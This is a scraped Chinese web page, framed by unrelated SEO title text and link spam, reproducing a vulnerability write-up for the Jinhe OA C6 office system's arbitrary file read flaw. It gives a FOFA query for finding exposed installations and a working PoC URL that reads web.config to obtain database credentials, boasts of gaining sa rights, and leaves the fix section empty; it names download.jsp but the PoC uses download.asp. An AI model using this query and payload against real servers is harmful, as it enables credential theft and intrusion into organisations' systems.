当前位置: 首页 > news >正文

免费完整版的网站模板图片外链工具

免费完整版的网站模板,图片外链工具,网站logo怎么做,肥东房产网漏洞描述 金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同…

漏洞描述

金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断地更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。

该OA C6系统的download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器的敏感信息。

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!
在这里插入图片描述

资产确定

fofa:app=“金和网络-金和OA”

漏洞复现

1.执行POC即可获取Web.config文件内容,其中包含数据库账号密码。

http://IP/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

在这里插入图片描述
拿到了sa权限,剩下的不用我说了,大家都懂

修复方案

http://www.yayakq.cn/news/997632/

相关文章:

  • 哪里找做网站的wordpress saharan
  • 手机上自己如何做网站上海广告公司电话
  • 山东网站策划怎么做网络舆情参考
  • 做cpa用单页网站好还是昆明网站的建设
  • 哪个网站推荐做挖机事的9元包邮网站怎么做
  • 长春住房和城乡建设部官方网站app营销策略模板
  • 如何使用微信公众号做网站ae免费模板网站
  • 保山网站建设报价百度景安空间网站
  • 石家庄网站定制模板建站wordpress上传数据
  • 网站建设人员工资山东网站建设费用
  • 我对网站开发的反思网页设计与制作项目教程答案
  • 四川和住房城乡建设厅网站首页下载关键词推广软件
  • 百度网盘做存储网站网络营销推广目的
  • 云南建个网站哪家便宜wordpress微信公众平台开发
  • 衣服商业网站建设策划书tp做网站
  • 做外贸没有网站可以吗id怎样转wordpress
  • 国际物流网站建设各大网站的网址
  • 最新电子产品网站模板朝阳住房和城乡建设厅网站
  • 网站建设分解结构网站开发规划
  • 做阿里巴巴好还是网站好原创文字的网站
  • app和网站开发区别移动端数据可视化
  • 福州哪家网站制作设计高端还实惠画册设计公司网站
  • 成都网站建设门户做自己的网站流量怎么
  • 宿州网站公司重庆的互联网公司
  • 给人做网站赚钱网络营销分销策略是什么
  • 单位网站建设情况汇报域名地址大全
  • 自媒体135网站微信小程序双人游戏情侣
  • 有关师德建设的网站手机上使用wordpress
  • 网站开发的人福建省住房城乡和建设厅网站
  • 电子商务网站建设实训作业dede网站seo